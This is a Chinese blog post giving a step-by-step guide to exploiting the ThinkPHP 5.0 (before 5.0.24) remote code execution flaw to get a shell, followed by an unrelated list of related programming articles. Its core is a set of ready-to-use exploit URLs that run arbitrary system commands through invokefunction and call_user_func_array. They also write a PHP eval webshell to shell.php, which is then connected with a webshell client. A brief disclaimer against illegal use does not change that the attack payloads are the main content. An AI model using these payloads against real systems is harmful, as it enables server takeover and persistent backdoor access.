如何利用ThinkPHPv5的漏洞來getshell

原創 星空下de青铜 2020-06-20 18:31

影響範圍

ThinkPHP 5.0系列 < 5.0.24

過程

查看信息

http://ip(url)/index.php?s=index/\think\app/invokefunction&function=phpinfo&vars[0]=id(1,2,3之類的)

http://ip(url)/index.php?s=index/think\app/invokefunction&function=call_user_func_array&vars[0]=system&vars[1][]=想執行的系統命令

爆錯得到cms爲tp5信息(一般情況下不太可能)
在這裏插入圖片描述

http://ip(url)/index.php?s=index/\think\app/invokefunction&function=phpinfo&vars[0]=1

查看phpinfo()
在這裏插入圖片描述

http://ip(url)/index.php?s=index/\think\template\driver\file/write&cacheFile=shell.php&content=想寫入的東西

下面的已經的寫了一句話

http://ip(url)/index.php?
?s=index/think\app/invokefunction&function=call_user_func_array&vars[0]=file_put_contents&vars[1][0]=shell.php&vars[1][1]=<?php eval($_REQUEST["shell"]);?>

在這裏插入圖片描述寫入成功

菜刀連接

因爲一句話寫到了shell.php 所以這裏這裏連接到shell.php就行了

在這裏插入圖片描述

ps:小編也是剛入門,有不足的地方請大佬們多多指教
想對和我一樣的小白們說:嚴禁用來幹非法之事,搞自己的靶機不香嗎

發表評論
所有評論
還沒有人評論,想成為第一個評論的人麼? 請在上方評論欄輸入並且點擊發布.
相關文章

Postman 拷貝 curl 不識別 --data-raw

postman:請求路徑:       拷貝出來的curl: curl --location --request POST 'http://xxxxxxxxxxxxx/xxx/xxx' \ --header 'Content-Type:

亮sir 2024-06-06 14:26:55

985 碩士程序員,空窗 4 個月沒有 Offer!

大家好,我是R哥。 最近,R哥分享了幾個特別有意思的面試輔導成功案例: 35K*14 薪入職了,這公司只要不裁員,我能一直呆下去。。 幹了 2 年多 Java 外包,終於脫離了! 輔導一週,連拿 3 個 Offer! 說到

Java技術棧 2024-06-06 14:24:35

(數據科學學習手札161)高性能數據分析利器DuckDB在Python中的使用

本文完整代碼及附件已上傳至我的Github倉庫https://github.com/CNFeffery/DataScienceStudyNotes 1 簡介   大家好我是費老師,就在幾天前,經過六年多的持續開發迭代,著名的開源高性能分

費弗裏 2024-06-06 14:24:35

WindowsServer--SQL Server搭建主從同步實現讀寫分離 - 事務性分發

十年河東,十年河西,莫欺少年窮 學無止境,精益求精 先決條件 主服務器也稱之爲分發服務器,從服務器稱之爲訂閱服務器 下文皆按照主/從服務器稱呼 主服務器和訂閱服務器需在同一個內網網絡內 主服務器和訂閱服務器安裝相同版本sqlserver,本

天才臥龍 2024-06-06 14:24:25

終於搞懂了!原來vue3中template使用ref無需.value是因爲這個

前言 衆所周知,vue3的template中使用ref變量無需使用.value。還可以在事件處理器中進行賦值操作時,無需使用.value就可以直接修改ref變量的值,比如:<button @click="msg = 'Hello Vue3'

你假裝沒察覺 2024-06-06 14:24:14

調試chatglm4代碼

import torch from transformers import AutoModelForCausalLM, AutoTokenizer from modeling_chatglm import ChatGLMForConditi

張博的博客 2024-06-06 14:22:54

記一次 .NET某工控視覺自動化系統 卡死分析

一:背景 1. 講故事 今天分享的dump是訓練營裏一位學員的,從一個啥也不會到現在分析的有模有樣,真的是看他成長起來的,調試技術學會了就是真真實實自己的,話不多說,上windbg說話。 二:WinDbg 分析 1. 爲什麼會卡死 這位學員

一線碼農 2024-06-06 14:18:44

k8s組件和網絡插件掛掉,演示已有的pod是否正常運行

  環境 03 master ,05 06是node [root@mcwk8s03 mcwtest]# kubectl get nodes -o wide NAME STATUS ROLES AGE VERSI

馬昌偉 2024-06-06 14:16:54

創建一條隧道網絡,進行傳輸的時候,是否是轉換爲物理網卡IP進行通信? k8s組件和網絡插件掛掉,演示已有的pod是否正常運行

由此產生的疑問: k8s組件和網絡插件掛掉,演示已有的pod是否正常運行       【1】創建一條隧道網絡,進行傳輸的時候,是否是轉換爲物理網卡IP進行通信?   在創建隧道網絡進行傳輸時,通常不會直接轉換爲物理網卡IP進行通信。

馬昌偉 2024-06-06 14:16:54

aecmap直接用地理座標系計算面積

aecgis直接用地理座標系計算面積 1.添加字段,選擇雙精度 2.打開字段計算器,選擇python 3.輸入: !Shape.geodesicArea!/1000000  4.計算           @ouyang 翻譯 搜索

莫小龍 2024-06-06 14:16:34

java由於越界導致的報錯

問題 兩種計算時間戳的結果不一樣。 int days = 30; Instant now = Instant.now(); long timestamp_cur = now.toEpochMilli(); long nowPre = ti

jihite 2024-06-06 14:11:03

webDav網盤

今天又學習到了,優點是直接用IIS或nginx等發佈,使用80或443端口。   Windows Server 安裝 WebDAV (步驟超詳細) - 鄭道傑 - 博客園 (cnblogs.com) 全網最詳細 WebDAV 搭建文檔(Wi

81 2024-06-06 14:09:13

NFS,smb和數據庫文件

nfs的搭建網上有很多,可自行查看 Windows Server2012 R2搭建NFS服務器 - 知乎 (zhihu.com) 其中Windows10家庭版不支持NFS客戶端,目前Windows上的協議是V3版本,防火牆上有NFS的選項,

81 2024-06-06 14:09:13

賽博鬥地主——使用大語言模型扮演Agent智能體玩牌類遊戲。

通過大模型來實現多個智能體進行遊戲對局這個想對已經比較成熟了無論是去年驚豔的斯坦福小鎮還是比如metaGPT或者類似的框架都是使用智能體技術讓大模型來操控,從而讓大模型跳出自身“預測下一個token”的文字功能去探索更多的應用落地可能性。不

a1010 2024-06-06 14:08:23

python內置函數——sorted

對List、Dict進行排序,Python提供了兩個方法 對給定的List L進行排序, 方法1.用List的成員函數sort進行排序,在本地進行排序,不返回副本 方法2.用built-in函數sorted進行排序(從2.4開始),返回副本

python學習者0 2024-06-06 14:07:53